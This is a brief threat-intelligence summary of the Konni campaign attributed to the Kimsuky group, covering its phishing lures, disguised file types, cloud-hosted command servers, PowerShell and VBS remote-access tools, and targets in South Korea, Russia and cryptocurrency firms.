In a recent analysis, it has been revealed that the Konni campaign poses a significant threat due to the growing activity of the Kimsuky group. This group utilizes various methods to carry out covert attacks, with a particular focus on using legal cloud services and FTP for the initial infection stage of target systems. By employing these tactics, malicious files become harder to detect, impacting systems not only in South Korea but also in Russian state institutions and other international facilities.
The Kimsuky group employs tactics such as Spear-Phishing and the use of malicious documents, including files with extensions such as ‘.exe’, ‘.Scr’, and ‘.ppam’, to disguise their attacks as legitimate requests or documents. In a specific attack identified in 2022, the group used fake documents related to Russia’s foreign policy activities, as well as documents on taxes and financial transactions, highlighting the broad scope of their campaign.
To remotely execute management commands, the attackers utilize free domains and hosting services to create and conceal command control servers (C2). A key aspect of their attacks involves the modification and deployment of malware through the creation of software bookmarks (RAT) using PowerShell and VBS, enabling them to issue encrypted commands on compromised devices.
Through the analysis of numerous files, it is evident that the Kimsuky group has the ability to adapt to various conditions and employ sophisticated methods to bypass traditional protection systems, including fileless attacks. Advanced detection and response systems at endpoints (EDR) play a vital role in swiftly identifying threats and halting their progression in the early stages, thereby mitigating the risk of large-scale data breaches.
Notably, recent campaigns associated with Kimsuky have expanded beyond targeted attacks on state entities to include operations targeting representatives of cryptocurrency businesses, underscoring the group’s financial motivations.